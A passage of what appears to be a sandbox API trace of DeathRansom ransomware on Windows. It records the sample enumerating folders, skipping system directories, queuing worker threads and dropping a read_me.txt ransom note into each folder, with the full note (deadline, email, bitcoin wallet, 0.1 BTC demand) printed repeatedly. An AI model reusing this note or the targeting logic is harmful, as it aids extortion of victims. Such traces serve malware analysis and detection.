out: pszDest="\\\\?\\C:\\hiberfil.sys") returned 19 [0075.080] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x17e1e8 | out: lpFindFileData=0x17e1e8*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x17e230, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0075.080] wnsprintfW (in: pszDest=0x8aa0058, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache") returned 15 [0075.080] lstrcmpW (lpString1="MSOCache", lpString2="..") returned 1 [0075.080] lstrcmpW (lpString1="MSOCache", lpString2=".") returned 1 [0075.080] StrStrW (lpFirst="msocache", lpSrch="programdata") returned 0x0 [0075.080] StrStrW (lpFirst="msocache", lpSrch="$recycle.bin") returned 0x0 [0075.080] StrStrW (lpFirst="msocache", lpSrch="program files") returned 0x0 [0075.080] StrStrW (lpFirst="msocache", lpSrch="windows") returned 0x0 [0075.080] StrStrW (lpFirst="msocache", lpSrch="all users") returned 0x0 [0075.080] StrStrW (lpFirst="msocache", lpSrch="appdata") returned 0x0 [0075.080] GetProcessHeap () returned 0x4f10000 [0075.080] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ab0060 [0075.080] lstrcpyW (in: lpString1=0x8ab0060, lpString2="\\\\?\\C:\\MSOCache" | out: lpString1="\\\\?\\C:\\MSOCache") returned="\\\\?\\C:\\MSOCache" [0075.081] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 28 [0075.081] QueueUserWorkItem (Function=0x40a710, Context=0x8ab0060, Flags=0x0) returned 1 [0075.081] GetProcessHeap () returned 0x4f10000 [0075.081] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ac0068 [0075.081] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\*") returned 17 [0075.081] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\*", lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName=".", cAlternateFileName="")) returned 0x7cfe8e8 [0075.081] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\.") returned 17 [0075.081] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.081] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.081] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 1 [0075.081] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\..") returned 18 [0075.081] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.082] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0075.082] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users") returned 25 [0075.082] lstrcmpW (lpString1="All Users", lpString2="..") returned 1 [0075.082] lstrcmpW (lpString1="All Users", lpString2=".") returned 1 [0075.082] StrStrW (lpFirst="all users", lpSrch="programdata") returned 0x0 [0075.082] StrStrW (lpFirst="all users", lpSrch="$recycle.bin") returned 0x0 [0075.082] StrStrW (lpFirst="all users", lpSrch="program files") returned 0x0 [0075.082] StrStrW (lpFirst="all users", lpSrch="windows") returned 0x0 [0075.082] StrStrW (lpFirst="all users", lpSrch="all users") returned="all users" [0075.082] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="all users", cAlternateFileName="ALLUSE~1")) returned 0 [0075.082] FindClose (in: hFindFile=0x7cfe8e8 | out: hFindFile=0x7cfe8e8) returned 1 [0075.082] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\MSOCache\\read_me.txt") returned 27 [0075.082] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\read_me.txt" (normalized: "c:\\msocache\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x778 [0075.082] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.082] WriteFile (in: hFile=0x778, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e1d4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17e1d4*=0x6b3, lpOverlapped=0x0) returned 1 [0075.083] CloseHandle (hObject=0x778) returned 1 [0075.083] GetProcessHeap () returned 0x4f10000 [0075.083] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ac0068 | out: hHeap=0x4f10000) returned 1 [0075.083] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x17e1e8 | out: lpFindFileData=0x17e1e8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x814762c0, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0xa0000003, dwReserved1=0x17e230, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0075.083] wnsprintfW (in: pszDest=0x8aa0058, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\pagefile.sys") returned 19 [0075.083] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x17e1e8 | out: lpFindFileData=0x17e1e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x17e230, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0075.083] wnsprintfW (in: pszDest=0x8aa0058, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs") returned 15 [0075.083] lstrcmpW (lpString1="PerfLogs", lpString2="..") returned 1 [0075.083] lstrcmpW (lpString1="PerfLogs", lpString2=".") returned 1 [0075.084] StrStrW (lpFirst="perflogs", lpSrch="programdata") returned 0x0 [0075.084] StrStrW (lpFirst="perflogs", lpSrch="$recycle.bin") returned 0x0 [0075.084] StrStrW (lpFirst="perflogs", lpSrch="program files") returned 0x0 [0075.084] StrStrW (lpFirst="perflogs", lpSrch="windows") returned 0x0 [0075.084] StrStrW (lpFirst="perflogs", lpSrch="all users") returned 0x0 [0075.084] StrStrW (lpFirst="perflogs", lpSrch="appdata") returned 0x0 [0075.084] GetProcessHeap () returned 0x4f10000 [0075.084] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ac0068 [0075.084] lstrcpyW (in: lpString1=0x8ac0068, lpString2="\\\\?\\C:\\PerfLogs" | out: lpString1="\\\\?\\C:\\PerfLogs") returned="\\\\?\\C:\\PerfLogs" [0075.084] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 29 [0075.084] QueueUserWorkItem (Function=0x40a710, Context=0x8ac0068, Flags=0x0) returned 1 [0075.084] GetProcessHeap () returned 0x4f10000 [0075.084] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ad0070 [0075.084] wnsprintfW (in: pszDest=0x8ad0070, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\PerfLogs\\*") returned 17 [0075.084] FindFirstFileW (in: lpFileName="\\\\?\\C:\\PerfLogs\\*", lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName=".", cAlternateFileName="")) returned 0x7cfe8e8 [0075.085] wnsprintfW (in: pszDest=0x8ad0070, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\.") returned 17 [0075.085] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.085] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.085] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 1 [0075.085] wnsprintfW (in: pszDest=0x8ad0070, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\..") returned 18 [0075.085] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.085] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Admin", cAlternateFileName="")) returned 1 [0075.085] wnsprintfW (in: pszDest=0x8ad0070, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\Admin") returned 21 [0075.085] lstrcmpW (lpString1="Admin", lpString2="..") returned 1 [0075.085] lstrcmpW (lpString1="Admin", lpString2=".") returned 1 [0075.085] StrStrW (lpFirst="admin", lpSrch="programdata") returned 0x0 [0075.085] StrStrW (lpFirst="admin", lpSrch="$recycle.bin") returned 0x0 [0075.085] StrStrW (lpFirst="admin", lpSrch="program files") returned 0x0 [0075.085] StrStrW (lpFirst="admin", lpSrch="windows") returned 0x0 [0075.085] StrStrW (lpFirst="admin", lpSrch="all users") returned 0x0 [0075.085] StrStrW (lpFirst="admin", lpSrch="appdata") returned 0x0 [0075.085] GetProcessHeap () returned 0x4f10000 [0075.085] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ae0078 [0075.086] lstrcpyW (in: lpString1=0x8ae0078, lpString2="\\\\?\\C:\\PerfLogs\\Admin" | out: lpString1="\\\\?\\C:\\PerfLogs\\Admin") returned="\\\\?\\C:\\PerfLogs\\Admin" [0075.086] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 30 [0075.086] QueueUserWorkItem (Function=0x40a710, Context=0x8ae0078, Flags=0x0) returned 1 [0075.086] GetProcessHeap () returned 0x4f10000 [0075.086] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8af0080 [0075.086] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\PerfLogs\\Admin\\*") returned 23 [0075.086] FindFirstFileW (in: lpFileName="\\\\?\\C:\\PerfLogs\\Admin\\*", lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0075.087] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\Admin\\.") returned 23 [0075.087] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.087] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.087] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.087] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\Admin\\..") returned 24 [0075.087] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.087] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 0 [0075.087] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0075.087] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\PerfLogs\\Admin\\read_me.txt") returned 33 [0075.087] CreateFileW (lpFileName="\\\\?\\C:\\PerfLogs\\Admin\\read_me.txt" (normalized: "c:\\perflogs\\admin\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0075.094] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.094] WriteFile (in: hFile=0x7a8, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17df5c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17df5c*=0x6b3, lpOverlapped=0x0) returned 1 [0075.095] CloseHandle (hObject=0x7a8) returned 1 [0075.095] GetProcessHeap () returned 0x4f10000 [0075.095] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8af0080 | out: hHeap=0x4f10000) returned 1 [0075.096] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="admin", cAlternateFileName="")) returned 0 [0075.096] FindClose (in: hFindFile=0x7cfe8e8 | out: hFindFile=0x7cfe8e8) returned 1 [0075.096] wnsprintfW (in: pszDest=0x8ad0070, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\PerfLogs\\read_me.txt") returned 27 [0075.096] CreateFileW (lpFileName="\\\\?\\C:\\PerfLogs\\read_me.txt" (normalized: "c:\\perflogs\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x778 [0075.096] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.096] WriteFile (in: hFile=0x778, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e1d4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17e1d4*=0x6b3, lpOverlapped=0x0) returned 1 [0075.097] CloseHandle (hObject=0x778) returned 1 [0075.097] GetProcessHeap () returned 0x4f10000 [0075.097] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ad0070 | out: hHeap=0x4f10000) returned 1 [0075.098] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x17e1e8 | out: lpFindFileData=0x17e1e8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6eaf6f0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x6eaf6f0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x17e230, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0075.098] wnsprintfW (in: pszDest=0x8aa0058, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files") returned 20 [0075.098] lstrcmpW (lpString1="Program Files", lpString2="..") returned 1 [0075.098] lstrcmpW (lpString1="Program Files", lpString2=".") returned 1 [0075.098] StrStrW (lpFirst="program files", lpSrch="programdata") returned 0x0 [0075.098] StrStrW (lpFirst="program files", lpSrch="$recycle.bin") returned 0x0 [0075.098] StrStrW (lpFirst="program files", lpSrch="program files") returned="program files" [0075.098] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x17e1e8 | out: lpFindFileData=0x17e1e8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x17e230, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0075.098] wnsprintfW (in: pszDest=0x8aa0058, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)") returned 26 [0075.098] lstrcmpW (lpString1="Program Files (x86)", lpString2="..") returned 1 [0075.098] lstrcmpW (lpString1="Program Files (x86)", lpString2=".") returned 1 [0075.098] StrStrW (lpFirst="program files (x86)", lpSrch="programdata") returned 0x0 [0075.098] StrStrW (lpFirst="program files (x86)", lpSrch="$recycle.bin") returned 0x0 [0075.098] StrStrW (lpFirst="program files (x86)", lpSrch="program files") returned="program files (x86)" [0075.098] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x17e1e8 | out: 